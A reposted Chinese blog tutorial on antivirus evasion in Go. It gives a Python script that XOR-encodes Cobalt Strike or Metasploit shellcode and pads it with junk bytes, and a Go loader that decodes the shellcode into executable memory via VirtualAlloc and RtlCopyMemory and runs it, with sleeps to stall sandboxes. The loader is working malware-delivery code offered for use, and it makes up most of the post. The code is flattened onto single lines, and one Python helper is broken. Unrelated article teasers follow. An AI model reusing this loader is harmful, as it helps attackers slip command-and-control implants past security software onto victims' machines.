Golang免杀-编码加密-Xor(GG)

go语言环境搭建

Golang学习日志 ━━ 下载及安装_golang下载-CSDN博客

 

 go run xxx.go 

 go build xxx.go 

 

首先,cs.msf生成比特流数据.

10c56bbdf6444bb0a3f3faff62a1395a.png

 放入xor,py脚本中进行xor加密.

 xor.py

def xor(shellcode, key):new_shellcode = ""key_len = len(key)# 对shellcode的每一位进行xor亦或处理for i in range(0, len(shellcode)):s = ord(shellcode[i])p = ord((key[i % key_len]))s = s ^ p  # 与p异或,p就是key中的字符之一s = chr(s) new_shellcode += sreturn new_shellcodedef random_decode(shellcode):j = 0new_shellcode = ""for i in range(0,len(shellcode)):if i % 2 == 0:new_shellcode[i] = shellcode[j]j += 1return new_shellcodedef add_random_code(shellcode, key):new_shellcode = ""key_len = len(key)# 每个字节后面添加随机一个字节,随机字符来源于keyfor i in range(0, len(shellcode)):#print(ord(shellcode[i]))new_shellcode += shellcode[i]# print("&"+hex(ord(new_shellcode[i])))new_shellcode += key[i % key_len]#print(i % key_len)return new_shellcode# 将shellcode打印输出
def str_to_hex(shellcode):raw = ""for i in range(0, len(shellcode)):s = hex(ord(shellcode[i])).replace("0x",',0x')raw = raw + sreturn rawif __name__ == '__main__':shellcode="   比特流shellcode!!!!!       "# 这是异或和增加随机字符使用的keykey = "iqe"#print(shellcode[0])#print(len(shellcode))# 首先对shellcode进行异或处理shellcode = xor(shellcode, key)#print(len(shellcode))# 然后在shellcode中增加随机字符shellcode = add_random_code(shellcode, key)# 将shellcode打印出来print(str_to_hex(shellcode))

xor_dec.go

package mainimport ("syscall""time""unsafe"
)const (MEM_COMMIT             = 0x1000MEM_RESERVE            = 0x2000PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。)var (kernel32      = syscall.MustLoadDLL("kernel32.dll")ntdll         = syscall.MustLoadDLL("ntdll.dll")VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)func main() {mix_shellcode := []byte{       xor加密后的shellcode  !!!!!!           }var ttyolller []bytekey := []byte("iqe")var key_size = len(key)var shellcode_final []bytevar j = 0time.Sleep(2)// 去除垃圾代码//fmt.Print(len(mix_shellcode))for i := 0; i < len(mix_shellcode); i++ {if i%2 == 0 {shellcode_final = append(shellcode_final, mix_shellcode[i])j += 1}}time.Sleep(3)//fmt.Print(shellcode_final)// 解密异或for i := 0; i < len(shellcode_final); i++ {ttyolller = append(ttyolller, shellcode_final[i]^key[i%key_size])}time.Sleep(3)addr, _, err := VirtualAlloc.Call(0, uintptr(len(ttyolller)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)if err != nil && err.Error() != "The operation completed successfully." {syscall.Exit(0)}time.Sleep(3)_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&ttyolller[0])), uintptr(len(ttyolller)))if err != nil && err.Error() != "The operation completed successfully." {syscall.Exit(0)}syscall.Syscall(addr, 0, 0, 0, 0)
}

 运行xor_dec.go --->上线.

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/854959.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

从零开始设计一款gpu from scratch

从零开始设计一款gpu from scratch

基于RISC-V核心从零开始打造一款GPU芯片是一项复杂且具有挑战性的任务&#xff0c;涉及到硬件设计、软件支持、性能优化等多个方面。以下是一个详细的步骤指南&#xff0c;帮助你从零开始设计并实现一个基于RISC-V核心的GPU芯片。 1. 定义需求和目标 1.1 应用场景 确定GPU的…
阅读更多...
JAVA台球助教台球教练多端系统源码支持微信小程序+微信公众号+H5+APP

JAVA台球助教台球教练多端系统源码支持微信小程序+微信公众号+H5+APP

&#x1f3b1;台球助教系统&#xff1a;你的私人教练在线等你&#x1f3af; 功能介绍 球厅端&#xff1a;球厅认证、教练人数、教练的位置记录、助教申请、我的项目、签到记录、我的钱包、数据统计 教练端&#xff1a;我的页面&#xff0c;数据统计、订单详情、保证金、实名…
阅读更多...
CP测试是什么 及名词解释

CP测试是什么 及名词解释

芯片中的CP一般指的是CP测试&#xff0c;也就是晶圆测试&#xff08;Chip Probing&#xff09;。 一、CP测试是什么 CP测试在整个芯片制作流程中处于晶圆制造和封装之间&#xff0c;测试对象是针对整片晶圆&#xff08;Wafer&#xff09;中的每一个Die&#xff0c;目的是确保…
阅读更多...
如何衡量llm 数据集的多样性

如何衡量llm 数据集的多样性

衡量大型语言模型&#xff08;LLM&#xff09;数据集的多样性是一个复杂的问题&#xff0c;因为多样性可以从多个角度来考虑。以下是一些常用的方法和指标来评估数据集的多样性&#xff1a; 词汇多样性&#xff1a; 类型-词符比&#xff08;Type-Token Ratio, TTR&#xff09;…
阅读更多...
群辉DSM7下ZeroTier的安装

群辉DSM7下ZeroTier的安装

目录 一、起因 二、具体操作 1、添加组件源: 2、安装套件 3、开启ssh 4、连接ssh执行修补 5、手工启动ZeroTier 6、使用终端命令加入网络 7、审核通过该节点的加入 三、测试链接 1、PC端测试 2、手机APP测试 ZeroTier是个内网穿透的远程组网系统,它可以将全世界的终…
阅读更多...
功率半导体静态试验测试方法

功率半导体静态试验测试方法

VCES 集电极-发射极饱和电压 VCES&#xff08;Voltage Collector-Emitter Saturation&#xff0c;集电极-发射极饱和电压&#xff09;是指晶体管&#xff08;通常指双极型晶体管&#xff0c;如BJT&#xff09;在饱和工作区时集电极与发射极之间的电压。 测量VCES的过程通常如…
阅读更多...
算法笔记(二叉树1)

算法笔记(二叉树1)

leetcode144 二叉树的前序遍历 递归版本 public List<Integer> preorderTraversal(TreeNode root) {List<Integer> res new ArrayList<>();preorder(root, res);return res; }public void preorder(TreeNode root, List<Integer> res) {if (root n…
阅读更多...
【电子数据取证】如何快速在CSV中找到涉案手机号码

【电子数据取证】如何快速在CSV中找到涉案手机号码

文章关键词&#xff1a;电子数据取证、聊天记录恢复、数据恢复、手机取证、介质取证 一、前言 在最近的取证工作中&#xff0c;我们遇到很多需要从大量的聊天记录数据中提取特定的信息&#xff0c;例如手机号码&#xff0c;银行号码&#xff0c;交易码。由于数据通常以数据库…
阅读更多...
ipython的使用与详解

ipython的使用与详解

Ai文章推荐 1 作为程序员&#xff0c;开发用过最好用的AI工具有哪些&#xff1f; 2 Github Copilot正版的激活成功&#xff0c;终于可以chat了 3 idea,pycharm等的ai assistant已成功激活 4 新手如何拿捏 Github Copilot AI助手&#xff0c;帮助你提高写代码效率 5 Jetbrains的…
阅读更多...
Linux系统下多网卡多网关设置

Linux系统下多网卡多网关设置

场景一&#xff1a; 主机AB得网卡1和网卡2都分别划分在VLAN1和VLAN2中&#xff0c;主机C在VLAN3中&#xff0c;VLAN1&#xff0c;2&#xff0c;3在三层交换设备上配置好网关192.168.1.1 192.168.2.1 192.168.3.1&#xff0c;并开启三层交换功能。 主机A的两块网卡分别IP为192…
阅读更多...
Linter 与code formatter之python 编程起手式

Linter 与code formatter之python 编程起手式

1. Linter 与code formatter Linting and code formatting are essential practices in software development, particularly in Python, to maintain code quality, readability, and consistency. Let’s delve into their functions and how to use them in PyCharm when w…
阅读更多...
Sectigo OV通配符SSL证书多少钱?

Sectigo OV通配符SSL证书多少钱?

在网络安全领域&#xff0c;SSL数字证书起着至关重要的作用&#xff0c;尤其是在保护网站和用户信息方面。而Sectigo OV通配符证书是一种常用的数字证书之一&#xff0c;它能够为同一域名下的多个子域名提供保护&#xff0c;还能够通过企业验证来增强安全性。那么&#xff0c;对…
阅读更多...
边缘检测(一)-灰度图像边缘检测方法

边缘检测(一)-灰度图像边缘检测方法

灰度图像边缘检测是数字图像处理与机器视觉中经常遇到的一个问题&#xff0c;边缘检测是否连续、光滑是判断检测方法优劣的一个重要标准&#xff0c;下面通过一个实例提供灰度图像边缘检测方法&#xff0c;该方法对其他图像检测也具有一定的参考价值。 首先&#xff0c;读入一幅…
阅读更多...
inpaint下载安装2024-inpaint软件安装包下载v5.0.6官网最新版附加详细安装步骤

inpaint下载安装2024-inpaint软件安装包下载v5.0.6官网最新版附加详细安装步骤

Inpaint软件最新版是一款功能强大的图片去水印软件&#xff0c;这款软件拥有强大的智能算法&#xff0c;能够根据照片的背景为用户去除照片中的各种水印&#xff0c;并修补好去除水印后的图片。并且软件操作简单、界面清爽&#xff0c;即使是修图新手也能够轻松上手&#xff0c…
阅读更多...
面向对象编程基本概念

面向对象编程基本概念

面向过程概述 面向过程编程&#xff0c;就是一种以过程为中心的编程思想。 分析出解决问题所需要的步骤&#xff0c;然后用函数把步骤一步一步实现。使用的时候一个一个依次调用。 面向对象编程 面向对象编程是一种对是世界理解和抽象的编程方法&#xff0c;把相关的数据和…
阅读更多...
Python3 笔记:upper()、isupper()、lower()、islower()、swapcase()

Python3 笔记:upper()、isupper()、lower()、islower()、swapcase()

1、upper() 方法将字符串中的小写字母转为大写字母。 语法&#xff1a;str.upper() 2、isupper() 方法检测字符串中所有的字母是否都为大写。 语法&#xff1a;str.isupper() 如果字符串中包含至少一个区分大小写的字符&#xff0c;并且所有这些(区分大小写的)字符都是大写…
阅读更多...
2023年全国大学生数学建模竞赛C题蔬菜类商品的自动定价与补货决策(含word论文和源代码资源)

2023年全国大学生数学建模竞赛C题蔬菜类商品的自动定价与补货决策(含word论文和源代码资源)

文章目录 一、题目二、word版实验报告和源代码&#xff08;两种获取方式&#xff09; 一、题目 2023高教社杯全国大学生数学建模竞赛题目 C题 蔬菜类商品的自动定价与补货决策 在生鲜商超中&#xff0c;一般蔬菜类商品的保鲜期都比较短&#xff0c;且品相随销售时间的增加而…
阅读更多...
雨水情监测系统解决方案

雨水情监测系统解决方案

一、系统介绍 水库雨水情自动测报系统辅助水利管理部门实现水库雨水情信息“全要素、全量程、全覆盖”自动测报。系统具备水库水位、雨量、现场图像/视频等水文信息采集、传输、处理及预警广播等功能&#xff0c;有效提升了雨水情信息的时效性和准确度&#xff0c;为保障水库安…
阅读更多...
CSS 表单设计指南

CSS 表单设计指南

CSS 表单设计指南 引言 在网页设计中&#xff0c;表单是用户与网站交互的重要方式。一个设计良好的表单不仅能够提高用户体验&#xff0c;还能有效提升数据收集的效率。CSS&#xff08;层叠样式表&#xff09;作为网页设计的关键技术之一&#xff0c;可以极大地改善表单的外观…
阅读更多...
【网络协议栈】IGMP

【网络协议栈】IGMP

IGMP IGMP&#xff08;Internet Group Management Protocol&#xff09;是互联网组管理协议的简称&#xff0c;属于TCP/IP协议族中负责IPv4组播成员管理的协议。以下是关于IGMP的详细介绍&#xff1a; 1 定义与作用 定义&#xff1a;IGMP是多播组成员的一种通信协议&#xf…
阅读更多...
最新文章

Copyright @ 2022~2023